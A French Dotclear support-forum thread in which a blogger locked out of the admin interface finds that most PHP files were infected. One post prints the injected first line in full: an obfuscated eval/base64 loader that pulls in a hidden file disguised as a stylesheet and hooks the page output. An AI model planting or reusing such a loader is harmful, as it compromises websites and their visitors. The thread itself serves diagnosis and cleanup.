Dotclear

Vous n'êtes pas identifié(e).

Annonce

#1 2011-01-10 18:25:57

ChuTn3Y
Membre
Inscription : 2006-04-28
Site Web

problème accès interface admin & billets

Bonjour,

sans modification sur le serveur, je ne peux plus accéder à l'interface d'administration. quand je vais à l url wwww.monblog.com/ecrire , je suis redirigé vers la page www.monblog.com/ecrire/auth.php et la page est blanche.... pas de htaccess à la racine.

j'ai déjà posté un sujet dans la section dotclear 1 mais cette dernière ne doit plus être très fréquentée.

edit : un 2ème blog dotclear sur un hébergement totalement différent possède lui aussi ce problème depuis peu.... Le 1er est sur un hébergement free.fr & l autre sur un hébergement 1&1

auriez vous une idée pour régler ce problème car même jusque là le blog avait toujours marché sans problème particulier...

merci pour votre aide

Hors ligne

#2 2011-01-10 18:28:52

Jean-Michel
Modérateur à ailes d'ange
Lieu : Paris
Inscription : 2006-08-22
Site Web

Re : problème accès interface admin & billets

ChuTn3Y a écrit :

j'ai déjà posté un sujet dans la section dotclear 1 mais cette dernière ne doit plus être très fréquentée.

Si la section est fréquentée, on accède généralement par le filtre sur les nouveaux messages. Merci de ne pas générer un deuxième message alors qu'un premier existe déjà. Je déplace ton message sur la bonne section.

Hors ligne

#3 2011-01-13 10:29:53

ChuTn3Y
Membre
Inscription : 2006-04-28
Site Web

Re : problème accès interface admin & billets

personne n'a d'idée alors ? car mes 2 blogs sont bloqués et ne peuvent plus être mis à jour et ce sans intervention de ma part.

je ne souhaiterai pas tout réinstaller si cela était possible....

Hors ligne

#4 2011-01-13 11:16:23

Moe
Responsable du mini-bar
Lieu : France
Inscription : 2004-09-19
Site Web

Re : problème accès interface admin & billets

Si tu as le même problème sur 2 hébergements différents, la cause est probablement ce qui est commun, de ton côté. À tout hasard, as-tu essayé avec un autre navigateur ou depuis un autre ordinateur ?

Hors ligne

#5 2011-01-13 12:44:25

ChuTn3Y
Membre
Inscription : 2006-04-28
Site Web

Re : problème accès interface admin & billets

oui plusieurs ordinateurs, plusieurs navigateurs, plusieurs FAI....

sous Firefox : http://ajph.free.fr/ecrire/ me renvoie vers http://ajph.free.fr/ecrire/auth.php
sous IE : il me renvoie vers une page introuvable...

je commence à désespérer, ce sont des sites qui tournaient sans problème depuis 1 ou 2 ans...

Hors ligne

#6 2011-01-14 07:23:30

xave
Président
Lieu : commun
Inscription : 2004-05-06
Site Web

Re : problème accès interface admin & billets

Je n'ai pas grand-chose d'autre à te proposer que d'aller regarder l'état au moins du fichier auth.php sur le serveur. Moe a raison sur un point : si tu as le même problème sur 2 hébergements différents, la cause est probablement de ton côté. Sauf que je vois aussi un fichier vide, donc une des raisons possibles serait ... un virus. Il y en a quelques-un qui aiment bien accéder à tes infos FTP et aller coller leurs saloperies au début des fichiers PHP qu'ils trouvent sur les serveurs.


xave, asocial assez atypique (©Koz) , en 15ème année de http://xave.org/
RTFM. / Je ne lis pas la LOL-langue. / Je suis un gars désagréable, ne me parlez pas.

Hors ligne

#7 2011-01-14 13:29:02

ChuTn3Y
Membre
Inscription : 2006-04-28
Site Web

Re : problème accès interface admin & billets

Merci pour votre aide, j'ai fini par TROUVER !

après avoir tout supprimé du serveur et en réinstallant un dotclear propre, j'ai tenté de réuploadé certains fichiers un par un pour voir lequel posait problème

une bonne partie des fichiers .php était infectés par cette ligne de code située à la 1ere ligne de chaque fichier :
<code>
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTU3L3NkYS84L2IvYWpwaC90ZXN0L3YyL2RvdGNsZWFyL2VjcmlyZS90b29scy9pbmZvL2wxMG4vZGUvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
</code>

tous les fichiers .php à la racine du serveur, le config.php dans le dossier /conf ainsi que tous les  fichiers php de mon theme. en supprimant cette ligne et en reuploadant les fichiers, tout refonctionne !!

par contre quelqu'un connait il une protection pour que ce genre de chose ne puisse pas se reproduire ?

Hors ligne

#8 2011-01-14 13:46:46

Dsls
Modérateur couteau-suisse
Inscription : 2004-11-18
Site Web

Re : problème accès interface admin & billets

ChuTn3Y a écrit :

par contre quelqu'un connait il une protection pour que ce genre de chose ne puisse pas se reproduire ?

http://forum.dotclear.net/viewtopic.php?id=40783


Dyslexics have more fnu!

Hors ligne

#9 2011-01-14 16:07:41

ChuTn3Y
Membre
Inscription : 2006-04-28
Site Web

Re : problème accès interface admin & billets

merci Dsls

Hors ligne

#10 2012-02-29 09:07:37

JacquesD
Membre
Inscription : 2012-02-29

Re : problème accès interface admin & billets

Bonjour,
J'ai un problème similaire sur un dotclear 1. Le blog affiche tous les articles et commentaires par contre dans la partie administration en back office en me connectant sous monblog/ecrire je ne vois ni mes billets ni les commentaires.
J'ai nettoyé la base SQL.
J'ai regardé mes fichiers .php sur mon serveur, mais je ne vois pas.
Si quelqu'un avait une piste ?
Merci d'avance

Jacques

Hors ligne

#11 2012-02-29 09:15:38

pierrevg
Membre
Inscription : 2005-04-13
Site Web

Re : problème accès interface admin & billets

Bonjour et bienvenue

Tu nous fais un screen de ce que tu vois en précisant avec quel navigateur ?
Version précise de dotclear ?
Hébergeur ?
Version de php ?
Bref, des infos pour qu'on puisse chercher un peu...

Merci.

Hors ligne

#12 2012-02-29 09:16:51

Philippe
Stagiaire
Lieu : Toulon
Inscription : 2004-06-13
Site Web

Re : problème accès interface admin & billets

Bonjour

As-tu suivi le lien et les indications de Dsls dans son message ci-dessus ?

Sinon, Dotclear 1 n'est plus supporté depuis au moins 5 ans, tu pourrais en profiter pour faire une migration ;)

Hors ligne

Vous n'êtes pas identifié(e).

Pied de page des forums

Sites map